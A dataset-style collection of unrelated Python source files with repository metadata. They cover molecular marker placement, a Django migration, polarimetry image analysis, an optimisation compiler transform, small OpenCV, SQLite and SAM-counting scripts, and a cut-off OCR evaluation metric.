mark=s.place_marker((434.76, 555.312, 472.908), (0.89, 0.1, 0.1), 17.1475)
if "Exo70_2" not in marker_sets:
s=new_marker_set('Exo70_2')
marker_sets["Exo70_2"]=s
s= marker_sets["Exo70_2"]
mark=s.place_marker((441.382, 555.571, 444.877), (0.89, 0.1, 0.1), 17.1475)
if "Exo70_3" not in marker_sets:
s=new_marker_set('Exo70_3')
marker_sets["Exo70_3"]=s
s= marker_sets["Exo70_3"]
mark=s.place_marker((444.866, 549.75, 416.966), (0.89, 0.1, 0.1), 17.1475)
if "Exo70_4" not in marker_sets:
s=new_marker_set('Exo70_4')
marker_sets["Exo70_4"]=s
s= marker_sets["Exo70_4"]
mark=s.place_marker((448.336, 543.908, 389.047), (0.89, 0.1, 0.1), 17.1475)
if "Exo70_GFPC" not in marker_sets:
s=new_marker_set('Exo70_GFPC')
marker_sets["Exo70_GFPC"]=s
s= marker_sets["Exo70_GFPC"]
mark=s.place_marker((395.034, 379.324, 364.988), (1, 0.2, 0.2), 18.4716)
if "Exo70_Anch" not in marker_sets:
s=new_marker_set('Exo70_Anch')
marker_sets["Exo70_Anch"]=s
s= marker_sets["Exo70_Anch"]
mark=s.place_marker((509.963, 703.963, 400.71), (1, 0.2, 0.2), 18.4716)
if "Exo84_GFPN" not in marker_sets:
s=new_marker_set('Exo84_GFPN')
marker_sets["Exo84_GFPN"]=s
s= marker_sets["Exo84_GFPN"]
mark=s.place_marker((484.167, 529.899, 466.221), (0.9, 0.4, 0), 18.4716)
if "Exo84_0" not in marker_sets:
s=new_marker_set('Exo84_0')
marker_sets["Exo84_0"]=s
s= marker_sets["Exo84_0"]
mark=s.place_marker((456.915, 531.184, 463.224), (1, 0.5, 0), 17.1475)
if "Exo84_1" not in marker_sets:
s=new_marker_set('Exo84_1')
marker_sets["Exo84_1"]=s
s= marker_sets["Exo84_1"]
mark=s.place_marker((419.117, 531.73, 454.695), (1, 0.5, 0), 17.1475)
if "Exo84_2" not in marker_sets:
s=new_marker_set('Exo84_2')
marker_sets["Exo84_2"]=s
s= marker_sets["Exo84_2"]
mark=s.place_marker((382.083, 534.83, 446.189), (1, 0.5, 0), 17.1475)
if "Exo84_3" not in marker_sets:
s=new_marker_set('Exo84_3')
marker_sets["Exo84_3"]=s
s= marker_sets["Exo84_3"]
mark=s.place_marker((350.763, 537.456, 439.006), (1, 0.5, 0), 17.1475)
if "Exo84_GFPC" not in marker_sets:
s=new_marker_set('Exo84_GFPC')
marker_sets["Exo84_GFPC"]=s
s= marker_sets["Exo84_GFPC"]
mark=s.place_marker((381.405, 457.09, 488.981), (1, 0.6, 0.1), 18.4716)
if "Exo84_Anch" not in marker_sets:
s=new_marker_set('Exo84_Anch')
marker_sets["Exo84_Anch"]=s
s= marker_sets["Exo84_Anch"]
mark=s.place_marker((292.706, 611.017, 387.815), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"[email protected]"
] | |
1bce63e3d413d22d5c4e516e69f4256bfee33379 | cd41fbf35cc3205b5bfad83702d95ec7b575d5c8 | /kilogram_app/mysite/kilogram/migrations/0001_initial.py | c86b9550467cb1e262952d586a25967c7a244929 | [] | no_license | devnunu/django-study | 3779ed23f70ec0e689252a634dd745c88e173e78 | 0e0b29926a9bf5063166079dd8232a51a9154256 | refs/heads/master | 2021-03-27T09:49:23.760190 | 2017-07-03T06:37:23 | 2017-07-03T06:37:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,048 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-27 11:42
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import kilogram.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to=kilogram.models.user_path)),
('thumbnail', models.ImageField(upload_to=b'')),
('comment', models.CharField(max_length=255)),
('pub_date', models.DateTimeField(auto_now_add=True)),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
bb8545a3b2263351f5c717ce6b6836f8d18e1faf | d424e2443711fe32406124dc3d2bdfe099ba7bc6 | /polarimetry.py | 5ec2124e01b13e85f4ce1b04f00e17b496343b89 | [] | no_license | ptweir/flypod | 110fcbdbfd7c3725f7c2fc5048427a7f7469ce18 | 1f049d2728ee519430fedb6734f094d18887a7f2 | refs/heads/master | 2021-01-23T05:39:14.599436 | 2012-01-09T18:55:37 | 2012-01-09T18:55:37 | 418,820 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,866 | py | import numpy as np
import motmot.FlyMovieFormat.FlyMovieFormat as FMF
import colormapTools as cmt
import pylab
import sys, os, time
from scipy.stats.morestats import circmean
from scipy.signal import sepfir2d, gaussian #, convolve2d
def show_angle(angle,power):
ARROW_STEP = 40
kernel = np.ones((ARROW_STEP,ARROW_STEP))
rowFilter = gaussian(ARROW_STEP,ARROW_STEP/5)
colFilter = rowFilter
gb180 = cmt.get_cmap('gb180')
#X = np.arange(0,angle.shape(-1),ARROW_STEP)
#Y = np.arange(0,angle.shape(-2),ARROW_STEP)
x = np.matrix(np.arange(ARROW_STEP/2,angle.shape[-1],ARROW_STEP))
y = np.transpose(np.matrix(np.arange(ARROW_STEP/2,angle.shape[-2],ARROW_STEP)))
X = np.array((0*y+1)*x)
Y = np.array(y*(0*x+1))
#u = convolve2d(sin(angle),kernel,mode='same')
#v = convolve2d(cos(angle),kernel,mode='same')
#p = convolve2d(power,kernel,mode='same')
u = sepfir2d(np.sin(angle),rowFilter,colFilter)
v = sepfir2d(np.cos(angle),rowFilter,colFilter)
p = sepfir2d(power,rowFilter,colFilter)
U = u[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP]*p[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP]
V = v[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP]*p[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP]
#U = sin(angle[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP])*(power[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP])
#V = cos(angle[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP])*(power[ARROW_STEP/2::ARROW_STEP,ARROW_STEP/2::ARROW_STEP])
#X = X[(power[::ARROW_STEP,::ARROW_STEP]>.016)]
#Y = Y[(power[::ARROW_STEP,::ARROW_STEP]>.016)]
#U = U[(power[::ARROW_STEP,::ARROW_STEP]>.016)]
#V = V[(power[::ARROW_STEP,::ARROW_STEP]>.016)]
ua = ARROW_STEP/1.5*np.nansum(np.sin(angle)*power)/np.nansum(power)
va = -ARROW_STEP/1.5*np.nansum(np.cos(angle)*power)/np.nansum(power)
xc, yc = angle.shape[-1]/2, angle.shape[-2]/2
pylab.imshow(angle,cmap=gb180)
#pylab.imshow(angle,cmap='hsv')
pylab.quiver(X,Y,U,V,pivot='middle',color='w',headwidth=1,headlength=0)
pylab.arrow(xc,yc,ua,va,color='w',linewidth=2)
pylab.arrow(xc,yc,-ua,-va,color='w',linewidth=2)
ax=pylab.gca()
ax.set_axis_off()
pylab.show()
A = np.arctan2(-ua,va)
return A
def do_fft(pixels,time=None):
data = pixels
if time is None:
t = arange(data.shape[-1])
else:
t = time
d = np.median(np.diff(time))
rsp = np.fft.rfft(data)
fp = np.fft.fftfreq(data.shape[-1],d)
fpp = fp[fp>=0]
freq = np.empty(rsp.shape[-1])
freq[:fpp.shape[-1]] = fpp
if fp.shape[-1] != rsp.shape[-1]:
freq[-1] = -np.min(fp)
amp = np.abs(rsp)
pwr = amp**2
phs = np.angle(rsp) # something is wrong here
#phs = np.arctan2(rsp.real,rsp.imag)
ind = np.argmax(pwr*(freq!=0),axis=2)
i = np.median(ind)
#i=9
print i, freq[i]
s = np.sum(pwr,axis=2)
power = pwr[:,:,i]/s
phase = phs[:,:,i]
return power, phase
def do_polarimetry(fmf,firstFrame=0,nFrames=500):
PLOTPIX = False
if PLOTPIX is True:
fig = pylab.figure()
fig.hold('on')
if fmf.get_n_frames() < nFrames+firstFrame:
nFrames = fmf.get_n_frames()-firstFrame
print "fmf only has " + str(fmf.get_n_frames()) + " frames"
frame,timestamp = fmf.get_frame(firstFrame)
N = 3
Nx = N
Ny = N
LEFT = 120
RIGHT = 600
TOP = 0
BOTTOM = frame.shape[-2]
#X = np.round(np.linspace(0,frame.shape[-1],Nx+1))
X = np.round(np.linspace(LEFT,RIGHT,Nx+1))
Y = np.round(np.linspace(TOP,BOTTOM,Ny+1))
power = np.empty(frame.shape)
power.fill(np.nan)
phase = np.empty(frame.shape)
phase.fill(np.nan)
intensity = np.empty(frame.shape)
intensity.fill(np.nan)
for i,x in enumerate(X[:-1]):
for j,y in enumerate(Y[:-1]):
ROIFrames = np.empty([Y[j+1]-y,X[i+1]-x,nFrames])
timestamps = np.empty(nFrames)
for frameNumber in range(nFrames):
frame,timestamps[frameNumber] = fmf.get_frame(frameNumber+firstFrame) # start at firstFrame
ROIFrames[:,:,frameNumber] = frame[y:Y[j+1],x:X[i+1]]
power[y:Y[j+1],x:X[i+1]], phase[y:Y[j+1],x:X[i+1]] = do_fft(ROIFrames,timestamps)
intensity[y:Y[j+1],x:X[i+1]] = np.mean(ROIFrames,axis = 2)
if PLOTPIX is True:
pylab.figure(fig.number)
fig.hold('on')
pylab.plot(timestamps,ROIFrames[0,0,:], label='p=' + str(power[y,x])[:4] + ' a=' + str(phase[y,x]*180/np.pi)[:4])
pylab.legend()
pylab.show()
pylab.draw()
power = power[Y[0]:Y[-1],X[0]:X[-1]] # not checked
phase = phase[Y[0]:Y[-1],X[0]:X[-1]]
intensity = intensity[Y[0]:Y[-1],X[0]:X[-1]]
return power, phase, intensity
def compare_file_times(fn1, fn2):
t1, t2 = int(fn1[4:12]+fn1[13:19]),int(fn2[4:12]+fn2[13:19])
return cmp(t1,t2)
def analyze_file(sky,fname=None):
"""
example:
power,angle,intensity=polarimetry.analyze_file(sky)
"""
WAIT_TIME = 20 #seconds after changeTimes to start polarimetry
ROT180 = True #because camera returns rotated image
if fname is None:
fileName = sky['fileName']
else:
fileName = fname
dirName = sky['dirName']
N = len(sky['changeTimes'][:-1])
fmf = FMF.FlyMovie(os.path.join(dirName,fileName))
frame,timestamp = fmf.get_frame(0)
if not sky.has_key('times'):
timestamps = fmf.get_all_timestamps()
else:
timestamps = sky['times']
for i, startTime in enumerate(sky['changeTimes'][:-1]):
startInd = np.argmin(abs(startTime + WAIT_TIME - timestamps))
sys.stdout.write(time.ctime(startTime + WAIT_TIME)+'\n')
#sys.stdout.write("%s\n" % (str(i)))
sys.stdout.flush()
pwr, phs, ints = do_polarimetry(fmf,firstFrame=startInd,nFrames=500)
phs = phs - circmean(np.ravel(phs[222:261,222:272]),high=np.pi,low=-np.pi)
ang = phs/2.0 # because phase offset of intensity values is twice angle between overlapping polarizers
if ROT180:
pwr = np.rot90(pwr,2)
ang = np.rot90(ang,2)
ints = np.rot90(ints,2)
"""
trueUpDirection = filename[3]
if trueUpDirection == 'E':
pwr = np.rot90(pwr,1)
ang = np.rot90(ang,1)
ints = np.rot90(ints,1)
ang = ang + np.pi/2
elif trueUpDirection == 'S':
pwr = np.rot90(pwr,2)
ang = np.rot90(ang,2)
ints = np.rot90(ints,2)
ang = ang + np.pi
elif trueUpDirection == 'W':
pwr = np.rot90(pwr,3)
ang = np.rot90(ang,3)
ints = np.rot90(ints,3)
ang = ang + 3*np.pi/2
"""
mask = ints>(np.mean(ints)-.45*np.std(ints)) #hack
mask[100:300,100:300] = True #not sure if central dot (polarizer) should be in or not... if so - threshold should be ~1 std below mean intensity
pwr[~mask] = np.nan
ang[~mask] = np.nan
ang = np.mod(ang+np.pi/2,2*np.pi)-np.pi/2
ang = cmt.add_colordisc(ang,width=71)
#ang = np.mod(ang+np.pi,2*np.pi)-np.pi
ang = np.mod(ang,2*np.pi)
if i==0:
w,h=ang.shape
power = np.empty([w,h,N])
power.fill(np.nan)
angle = np.empty([w,h,N])
angle.fill(np.nan)
intensity = np.empty([w,h,N])
intensity.fill(np.nan)
power[:,:,i],angle[:,:,i],intensity[:,:,i]=pwr,ang,ints
return power, angle, intensity
| [
"[email protected]"
] | |
86eea8e11ae880428de5ba853e098ca8caa4fb07 | ebc2878c0bc4e6e87d1b4f59eb8459bb5f73b3e1 | /python/epopt/compiler/transforms/separate.py | 2e36c780aa4bb4b25f85abae1cd77dabf490863f | [] | no_license | topherconley/epsilon | a86953dfe6604071d5856a93cc2dd5d3a26031aa | 2aa3680fefd5f689ec2df8935e32a1e3d4f29465 | refs/heads/master | 2021-01-15T16:15:31.567943 | 2016-02-13T14:10:11 | 2016-02-13T14:10:11 | 52,566,560 | 1 | 0 | null | 2016-02-26T00:19:27 | 2016-02-26T00:19:26 | null | UTF-8 | Python | false | false | 4,811 | py | """Analyze the problem in sum-of-prox form and combine/split terms."""
from collections import defaultdict
from epopt import expression
from epopt import tree_format
from epopt.compiler import validate
from epopt.compiler.problem_graph import *
from epopt.compiler.transforms import linear
from epopt.compiler.transforms.transform_util import *
from epopt.proto.epsilon.expression_pb2 import Expression, ProxFunction
from epopt.util import *
def replace_var(expr, old_var_id, new_var):
if (expr.expression_type == Expression.VARIABLE and
expr.variable.variable_id == old_var_id):
return new_var
return expression.from_proto(
expr.proto,
[replace_var(arg, old_var_id, new_var) for arg in expr.arg])
def is_least_squares_function(f):
return f.expr.prox_function.prox_function_type in (
ProxFunction.AFFINE,
ProxFunction.CONSTANT,
ProxFunction.SUM_SQUARE,
ProxFunction.ZERO) and not f.expr.prox_function.epigraph
def separate_var(f_var):
variable_id = "separate:%s:%s" % (
f_var.variable, fp_expr(f_var.function.expr))
return Expression(
expression_type=Expression.VARIABLE,
variable=Variable(variable_id=variable_id),
size=f_var.instances[0].size)
def move_equality_indicators(graph):
"""Move certain equality indicators from objective to constraints."""
# Single prox case, dont move it
if len(graph.nodes(FUNCTION)) == 1:
return
for f in graph.nodes(FUNCTION):
if f.expr.prox_function.prox_function_type == ProxFunction.ZERO:
# Modify it to be an equality constraint
f.expr = expression.indicator(Cone.ZERO, f.expr.arg[0])
f.node_type = CONSTRAINT
def is_prox_friendly_constraint(expr, var_id):
return expr.arg[0].affine_props.linear_maps[var_id].scalar
def has_incompatible_constraints(f, var, graph):
if is_least_squares_function(f):
return False
var_id = var.expr.variable.variable_id
for f in graph.neighbors(var, CONSTRAINT):
if not is_prox_friendly_constraint(f.expr, var_id):
return True
return False
def add_variable_copy(f, var, graph):
m, n = dims(var.expr)
old_var_id = var.expr.variable.variable_id
new_var_id = "separate:%s:%s" % (old_var_id, f.node_id)
new_var = graph.add_node(
expression.variable(m, n, new_var_id), VARIABLE, new_var_id)
f.expr = replace_var(f.expr, old_var_id, new_var.expr)
graph.remove_edge(f, var)
graph.add_edge(f, new_var)
eq_constr = graph.add_node(linear.transform_expr(
expression.eq_constraint(new_var.expr, var.expr)), CONSTRAINT)
graph.add_edge(eq_constr, new_var)
graph.add_edge(eq_constr, var)
def separate_objective_terms(graph):
for f in graph.nodes(FUNCTION):
for var in graph.neighbors(f, VARIABLE):
if (len(graph.neighbors(var, FUNCTION)) > 1 or
has_incompatible_constraints(f, var, graph)):
add_variable_copy(f, var, graph)
def add_constant_prox(graph):
"""Add f(x) = 0 term for variables only appearing in constraints."""
for var in graph.nodes(VARIABLE):
# Only add constant prox for variables not appearing in objective
if graph.neighbors(var, FUNCTION):
continue
f_expr = expression.prox_function(
ProxFunction(prox_function_type=ProxFunction.CONSTANT), var.expr)
graph.add_edge(graph.add_node(f_expr, FUNCTION), var)
def variables(expr):
if expr.expression_type == Expression.VARIABLE:
yield expr
for arg in expr.arg:
for var in variables(arg):
yield var
def add_function(f_expr, node_type, graph):
var_list = list(variables(f_expr))
# Exclude constant functions
if not var_list:
return
f = graph.add_node(f_expr, node_type)
for var_expr in var_list:
var_id = var_expr.variable.variable_id
graph.add_edge(f, graph.add_node(var_expr, VARIABLE, node_id=var_id))
def build_graph(problem):
graph = ProblemGraph()
for f_expr in problem.objective.arg:
add_function(f_expr, FUNCTION, graph)
for constr_expr in problem.constraint:
add_function(constr_expr, CONSTRAINT, graph)
return graph
GRAPH_TRANSFORMS = [
move_equality_indicators,
separate_objective_terms,
add_constant_prox,
]
def transform_problem(problem, params):
validate.check_sum_of_prox(problem)
graph = build_graph(problem)
if not graph.nodes(VARIABLE):
return problem
for f in GRAPH_TRANSFORMS:
f(graph)
log_debug(
lambda f, graph:
"%s:\n%s" %
(f.__name__,
tree_format.format_problem(graph.problem)),
f, graph)
return graph.problem
| [
"[email protected]"
] | |
bbba1a91cb2af44afcc81da8a035876a66ca82e2 | e4986f4d388ae25c8e3981b141f87a07d503648e | /PDI-WORK/PDI /trabalho2.py | 452d9ead0250d67263ceee0c2274377f96225eab | [] | no_license | samuelamico/samuelamico.github.io | 253b14167c1f52b57e14fb62eb564160f1827f81 | d58524e6dc6490eed97c9bdbe53de1f9a5f77ee1 | refs/heads/master | 2020-04-24T23:37:47.050376 | 2019-11-21T21:47:50 | 2019-11-21T21:47:50 | 172,350,716 | 1 | 0 | null | 2019-11-21T21:47:52 | 2019-02-24T14:54:41 | HTML | UTF-8 | Python | false | false | 1,150 | py | # Digital Image Processing
# Student: Samuel Amico
# Number: 20180010181
# Exercise 2.1 - bolhas.png
import numpy as np
import cv2
import time
image = cv2.imread('bolhas.png',0)
height, width = image.shape
print("height - y: ",height,"width - x: ",width)
# P1 = top-left & P2 = bottom-right
P1x = input("Ponto 1 x - top:")
P1y = input("Ponto 1 y - top:")
P2x = input("Ponto 2 x - bot:")
P2y = input("Ponto 2 y - bot:")
print("P1 = (",P1x,",",P1y,") ","P2 = (",P2x,",",P2y,")")
if (image is not None):
cv2.imshow("Original", image)
k = cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.rectangle(image,(int(P1x-3),int(P1y-3)),(int(P2x+3),int(P2y+3)),(0,0,0),2)
cv2.imshow("Rec in Image", image)
k = cv2.waitKey(0)
#cv2.imwrite('RecBolha.png',image)
# ROI --> black
for i in range(P1x,P2x):
for j in range(P1y,P2y):
image[i,j] = 0
cv2.imshow("Black ROI", image)
k = cv2.waitKey(0)
#cv2.imwrite('BolhaBlack.png',image)
cv2.destroyAllWindows()
# ROI --> White
for i in range(P1x,P2x):
for j in range(P1y,P2y):
image[i,j] = 255
cv2.imshow("White ROI", image)
k = cv2.waitKey(0)
#cv2.imwrite('BolhaWhite.png',image)
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
d9d96786f1659dec1da6e64defdcaa08f5debbd9 | 9e1546f4059567efad6a03735aee180f138fbeb5 | /case03/Select_Lab_t.py | 48b0da3daeb745e9a1041895f4adf159811fc9f1 | [] | no_license | Jordan1766/Arduino4Py | bf9a92c389f76efef8795b75195522277dbc56af | 7a6d2b00c34e86077102108800d60e74680c2237 | refs/heads/master | 2023-06-18T02:09:46.955255 | 2021-07-17T12:50:47 | 2021-07-17T12:50:47 | 378,774,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | # 哪一個數字出現最多 ?
import sqlite3
conn = sqlite3.connect('demo.db')
cursor = conn.cursor()
map = {}
for i in range(1, 40):
print(i)
map[i] = 0
print(map)
# 查詢資料列 sql
sql = 'SELECT id, n1, n2, n3, n4, n5, ts FROM Lotto'
cursor.execute(sql)
rows = cursor.fetchall()
print(rows)
for r in rows:
for i in range(1, 6):
map[r[i]] = map[r[i]] + 1
print(map)
maxValue = max(map.values())
print("max:", maxValue)
for k, v in map.items():
if(v == maxValue):
print("%d(%d)" % (k, maxValue))
cursor.close()
| [
"[email protected]"
] | |
6126a9b4b93db31b52895fb26ea50fea68e6c1dc | 69a8390f3832d5798a2181b7f104ed6aaa6f20ec | /mapped_count.py | bc0e0e36b0d74d907cb68812c0268e3304be657a | [] | no_license | natalie-23-gill/QAA | 46d5ed0399fce9cd26582f10013e1a6f9319e693 | b5f7aa703a2829f3ec5d0db6ef811269b419fd85 | refs/heads/master | 2023-07-22T04:17:35.421761 | 2021-09-08T03:47:49 | 2021-09-08T03:47:49 | 402,159,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,339 | py | #!/user/bin/env python
import argparse
#Get required variables
parser = argparse.ArgumentParser(description="Count unmapped and mapped reads using alligned SAM file")
parser.add_argument("-f", "--filename", help="Name of fa file", required=True)
parser.add_argument("-o", "--output_filename", help="K-mer size", required=True)
args = parser.parse_args()
file_name=str(args.filename)
output_filename =str(args.output_filename)
file = open(file_name,"r")
out_file = open(output_filename, "x")
mapped_counter=0
unmapped_counter=0
lc=0
while True:
line = file.readline().strip()
if line == "":
break
if not line.startswith("@"): #check for qname
lc+=1
line_items =line.split()
bit_flag = line_items[1]
if (int(bit_flag) & 4) !=4 and (int(bit_flag) & 256) !=256: #is it mapped?
mapped_counter+=1
else:
if (int(bit_flag) & 256) !=256:
unmapped_counter+=1
#write out results
out_file.write(file_name+"\n")
out_file.write("Number of mapped reads: " + str(mapped_counter) +"\n")
out_file.write("Number of unmapped reads: " + str(unmapped_counter)+"\n")
out_file.write("Number of reads: " + str(mapped_counter+unmapped_counter)+"\n")
out_file.write("Number of lines: " + str(lc)+"\n")
out_file.close()
file.close() | [
"[email protected]"
] | |
8cc8373627952f26a65a5579e25e60bffedd4ab5 | 020589016e34d6a95c670c8a2db66cc440494fa8 | /ppocr/utils/e2e_metric/Deteval.py | 2aa09304600ddb228ca9b70c8d7e860ac3205d19 | [
"Apache-2.0"
] | permissive | limpidezza/PaddleOCR | a2cd0b98b8e84a2253cb912e9cde8f06fb5aab0e | 54c152a0e8fcfc90148fb33b832c277b3f636c54 | refs/heads/release/2.1 | 2023-04-14T10:04:31.800593 | 2021-04-20T11:30:39 | 2021-04-20T11:30:39 | 357,181,144 | 0 | 0 | Apache-2.0 | 2021-04-20T11:30:40 | 2021-04-12T12:15:18 | null | UTF-8 | Python | false | false | 20,333 | py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import scipy.io as io
from ppocr.utils.e2e_metric.polygon_fast import iod, area_of_intersection, area
def get_socre(gt_dir, img_id, pred_dict):
allInputs = 1
def input_reading_mod(pred_dict):
"""This helper reads input from txt files"""
det = []
n = len(pred_dict)
for i in range(n):
points = pred_dict[i]['points']
text = pred_dict[i]['texts']
point = ",".join(map(str, points.reshape(-1, )))
det.append([point, text])
return det
def gt_reading_mod(gt_dir, gt_id):
gt = io.loadmat('%s/poly_gt_img%s.mat' % (gt_dir, gt_id))
gt = gt['polygt']
return gt
def detection_filtering(detections, groundtruths, threshold=0.5):
for gt_id, gt in enumerate(groundtruths):
if (gt[5] == '#') and (gt[1].shape[1] > 1):
gt_x = list(map(int, np.squeeze(gt[1])))
gt_y = list(map(int, np.squeeze(gt[3])))
for det_id, detection in enumerate(detections):
detection_orig = detection
detection = [float(x) for x in detection[0].split(',')]
detection = list(map(int, detection))
det_x = detection[0::2]
det_y = detection[1::2]
det_gt_iou = iod(det_x, det_y, gt_x, gt_y)
if det_gt_iou > threshold:
detections[det_id] = []
detections[:] = [item for item in detections if item != []]
return detections
def sigma_calculation(det_x, det_y, gt_x, gt_y):
"""
sigma = inter_area / gt_area
"""
return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) /
area(gt_x, gt_y)), 2)
def tau_calculation(det_x, det_y, gt_x, gt_y):
if area(det_x, det_y) == 0.0:
return 0
return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) /
area(det_x, det_y)), 2)
##############################Initialization###################################
# global_sigma = []
# global_tau = []
# global_pred_str = []
# global_gt_str = []
###############################################################################
for input_id in range(allInputs):
if (input_id != '.DS_Store') and (input_id != 'Pascal_result.txt') and (
input_id != 'Pascal_result_curved.txt') and (input_id != 'Pascal_result_non_curved.txt') and (
input_id != 'Deteval_result.txt') and (input_id != 'Deteval_result_curved.txt') \
and (input_id != 'Deteval_result_non_curved.txt'):
detections = input_reading_mod(pred_dict)
groundtruths = gt_reading_mod(gt_dir, img_id).tolist()
detections = detection_filtering(
detections,
groundtruths) # filters detections overlapping with DC area
dc_id = []
for i in range(len(groundtruths)):
if groundtruths[i][5] == '#':
dc_id.append(i)
cnt = 0
for a in dc_id:
num = a - cnt
del groundtruths[num]
cnt += 1
local_sigma_table = np.zeros((len(groundtruths), len(detections)))
local_tau_table = np.zeros((len(groundtruths), len(detections)))
local_pred_str = {}
local_gt_str = {}
for gt_id, gt in enumerate(groundtruths):
if len(detections) > 0:
for det_id, detection in enumerate(detections):
detection_orig = detection
detection = [float(x) for x in detection[0].split(',')]
detection = list(map(int, detection))
pred_seq_str = detection_orig[1].strip()
det_x = detection[0::2]
det_y = detection[1::2]
gt_x = list(map(int, np.squeeze(gt[1])))
gt_y = list(map(int, np.squeeze(gt[3])))
gt_seq_str = str(gt[4].tolist()[0])
local_sigma_table[gt_id, det_id] = sigma_calculation(
det_x, det_y, gt_x, gt_y)
local_tau_table[gt_id, det_id] = tau_calculation(
det_x, det_y, gt_x, gt_y)
local_pred_str[det_id] = pred_seq_str
local_gt_str[gt_id] = gt_seq_str
global_sigma = local_sigma_table
global_tau = local_tau_table
global_pred_str = local_pred_str
global_gt_str = local_gt_str
single_data = {}
single_data['sigma'] = global_sigma
single_data['global_tau'] = global_tau
single_data['global_pred_str'] = global_pred_str
single_data['global_gt_str'] = global_gt_str
return single_data
def combine_results(all_data):
tr = 0.7
tp = 0.6
fsc_k = 0.8
k = 2
global_sigma = []
global_tau = []
global_pred_str = []
global_gt_str = []
for data in all_data:
global_sigma.append(data['sigma'])
global_tau.append(data['global_tau'])
global_pred_str.append(data['global_pred_str'])
global_gt_str.append(data['global_gt_str'])
global_accumulative_recall = 0
global_accumulative_precision = 0
total_num_gt = 0
total_num_det = 0
hit_str_count = 0
hit_count = 0
def one_to_one(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idy):
hit_str_num = 0
for gt_id in range(num_gt):
gt_matching_qualified_sigma_candidates = np.where(
local_sigma_table[gt_id, :] > tr)
gt_matching_num_qualified_sigma_candidates = gt_matching_qualified_sigma_candidates[
0].shape[0]
gt_matching_qualified_tau_candidates = np.where(
local_tau_table[gt_id, :] > tp)
gt_matching_num_qualified_tau_candidates = gt_matching_qualified_tau_candidates[
0].shape[0]
det_matching_qualified_sigma_candidates = np.where(
local_sigma_table[:, gt_matching_qualified_sigma_candidates[0]]
> tr)
det_matching_num_qualified_sigma_candidates = det_matching_qualified_sigma_candidates[
0].shape[0]
det_matching_qualified_tau_candidates = np.where(
local_tau_table[:, gt_matching_qualified_tau_candidates[0]] >
tp)
det_matching_num_qualified_tau_candidates = det_matching_qualified_tau_candidates[
0].shape[0]
if (gt_matching_num_qualified_sigma_candidates == 1) and (gt_matching_num_qualified_tau_candidates == 1) and \
(det_matching_num_qualified_sigma_candidates == 1) and (
det_matching_num_qualified_tau_candidates == 1):
global_accumulative_recall = global_accumulative_recall + 1.0
global_accumulative_precision = global_accumulative_precision + 1.0
local_accumulative_recall = local_accumulative_recall + 1.0
local_accumulative_precision = local_accumulative_precision + 1.0
gt_flag[0, gt_id] = 1
matched_det_id = np.where(local_sigma_table[gt_id, :] > tr)
# recg start
gt_str_cur = global_gt_str[idy][gt_id]
pred_str_cur = global_pred_str[idy][matched_det_id[0].tolist()[
0]]
if pred_str_cur == gt_str_cur:
hit_str_num += 1
else:
if pred_str_cur.lower() == gt_str_cur.lower():
hit_str_num += 1
# recg end
det_flag[0, matched_det_id] = 1
return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag, hit_str_num
def one_to_many(local_sigma_table, local_tau_table,
local_accumulative_recall, local_accumulative_precision,
global_accumulative_recall, global_accumulative_precision,
gt_flag, det_flag, idy):
hit_str_num = 0
for gt_id in range(num_gt):
# skip the following if the groundtruth was matched
if gt_flag[0, gt_id] > 0:
continue
non_zero_in_sigma = np.where(local_sigma_table[gt_id, :] > 0)
num_non_zero_in_sigma = non_zero_in_sigma[0].shape[0]
if num_non_zero_in_sigma >= k:
####search for all detections that overlaps with this groundtruth
qualified_tau_candidates = np.where((local_tau_table[
gt_id, :] >= tp) & (det_flag[0, :] == 0))
num_qualified_tau_candidates = qualified_tau_candidates[
0].shape[0]
if num_qualified_tau_candidates == 1:
if ((local_tau_table[gt_id, qualified_tau_candidates] >= tp)
and
(local_sigma_table[gt_id, qualified_tau_candidates] >=
tr)):
# became an one-to-one case
global_accumulative_recall = global_accumulative_recall + 1.0
global_accumulative_precision = global_accumulative_precision + 1.0
local_accumulative_recall = local_accumulative_recall + 1.0
local_accumulative_precision = local_accumulative_precision + 1.0
gt_flag[0, gt_id] = 1
det_flag[0, qualified_tau_candidates] = 1
# recg start
gt_str_cur = global_gt_str[idy][gt_id]
pred_str_cur = global_pred_str[idy][
qualified_tau_candidates[0].tolist()[0]]
